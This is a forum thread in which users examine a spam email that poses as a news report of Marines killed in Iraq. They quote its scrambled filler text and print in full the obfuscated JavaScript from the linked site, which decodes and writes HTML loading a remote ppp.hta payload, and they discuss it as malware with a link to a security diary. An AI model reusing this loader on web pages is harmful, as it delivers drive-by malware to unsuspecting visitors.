The subject line was "Subject: 140 Marines Killed in Irraq Bombing" (sic)
>14 US Marines Killed in Iraq Bombing
>Guardian Unlimited
>
>By ROBERT H. REID. BAGHDAD, Iraq (AP) - 40 minutes ago.
>
>14 US Marines were killed when a huge bomb destroyed their lightly armored >vehicle, urling it into the air in a giant fireball in the deadliest roadside bombing >suffered by American forces in the Iraq war
>
>Read more... (linked to http://www.wckqp.vbnnews.com WHICH MIGHT BE A VIRUS OR SOMETHING)
Ah, but when I view the raw source of the message, I see this in the text/plain
MIME type section of it...
Hello,
he abandoned the notion of so insane an enterprise, deterred =
notguardianship. It was perhaps his one mistake. But the goodness ofAt =
the table sat a man of whom nothing was visible but the top ofThat is a =
matter between yourself and M. de Cussy, my General.His mind went back =
over the adventure of yesterday, if of yesterdayof France. Hagthorpe =
looked at Blood as he spoke. Blood noddedand depth of my genius.round =
Cape Tiburon, and thereafter, standing well out to sea, withrode =
oblivious of all others in the world that morning. He wassilence, at =
last, he held out his hand; and in silence BloodSpanish prisoners. But =
she contrived so to time her visits thatthing it had planned. But to =
correct the sentiment he evoked aAre you guilty or not guilty? snapped =
this peppery gentleman.in bitterness, it must be because that bitterness =
was anterior towomanhood as was the azalea among flowers. He hurried =
forth toMiss Bishop, seated at the cabin-table, looked at him steadily,
And then the HTML part begins.
The link itself (if you daren't go there) goes to a simple web site that has the text of a news article, though, like the email itself, it can't decide between 14 and 140 fatalities (CNN says 14). At the top of the page's code is this JavaScript that doesn't seem to do anything on my machine/browser (Mac/Safari 1.3)... Anyone know what it does?
<script>
var hr=location.href,st='',k='',s='',b='cgabbfbbgbcbbaibabcgccdfbcacfaceecdfbcacfbbcdbbcbbbbbfbafbbgbafbbbbbacficjhcjibbfbbbbaibbhbbgbabcfjbaibabbacbbgcficefcejceiceiceicfjbcfcgacehbbfbbgbcbbaibabcgccgachjcggchecgjcghciecdcbafbaacgbbcacfacdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgabbccjhbbecjhbajcdcbbacjhbajbabcgbcdecidcjjbbebbbbaibaicjicjhbbebbfcdecdcbbicjhbaibbhbabcgbcdebbgbbebbhbabcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbajbbfcefbafbbgbbfcfibafcjjbbjbaabafcjhbaicegcjjbaebajcficficehbafcjjbbjcjfbbbbbibabbbebbibafbabbbjcegbaebbgbajcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbcacfacegchcchccghbaibafcjjbahceacebcfjbbjbafbbabaabbbbbjcegbbbbbcbabbbababbbecegbacbbbcjjbbhbbfceacebcfjcgacehbbfcjjbbebafbbcbbgcgccgachjcggchecgjcghciecdcbafbaacgbbcacfbcdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbagcjhbbicjhbbfcjjbbebafbbcbbgcfibaabbbcjjbbhbajbabbbabbgcegbaibafbbabahbbfcjbceicjdcegbaebbebabbaccgbcdjcgjciicgjcghcgbceebajbbfbaebbgcjhceecdhcdccdccghchcchhcgbbafbabbbfbaecjhbbebabbaacegcjjbaebajcdcchachdchgcgjcgbcjhbbcbbccjfbafbbabbfbbgcjhbaibaicegbaebbgbajcdjcdhcfbcggbaabbbcjjbbhbajbabbbabbgcegbaibafbbabahbbfcjbceicjdcegcjjbaibafcjjbahceacebcfjcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbbfbabbbgciebafbajbabbbbbbhbbgceacdjbcacfbcegchcchccghbaibafcjjbahceacebcfjcdjceecejceiceiceicebcfjbbfbabbbgciebafbajbabbbbbbhbbgceacdjbbjbafbbabaabbbbbjcegcjjbaibbbbbfbabceacebcfjcdjceecejcfaceiceicebcfjcgacehbbfcjjbbebafbbcbbgcgc';
for(i=0;i<b.length;i++)
{
s+=b.slice(i,i+1).charCodeAt(0)-97;
};
for(j=0;j<String(s).length;j+=3)
{
k=parseInt(String(s).slice(j,j+3));
if(k>200){k-=200;}
st+=String.fromCharCode(k);
};
document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/ppp.hta'));
</script>
Hmm... That code appears to just be a complex way of redirecting the browser to http colon slash slash www dot wckqp dot vbnnews dot com slash ppp dot hta, which houses a heap load of VBCode. (I tried pasting it in here but it whined the text field is too long.) So it is most certainly a hax or exploit or something.
Looks like there is some HTML code obfuscated in that long string, which is decrypted and has that URL insert into it, and is the inserted into the page. I am too lazy to run that decryption code to see what exactly the code is, though.
http://isc.sans.org/diary.php?date=2005-08-04
The Internet Storm Center noticed this neat little browser-malware trick on the day >>1 was posted.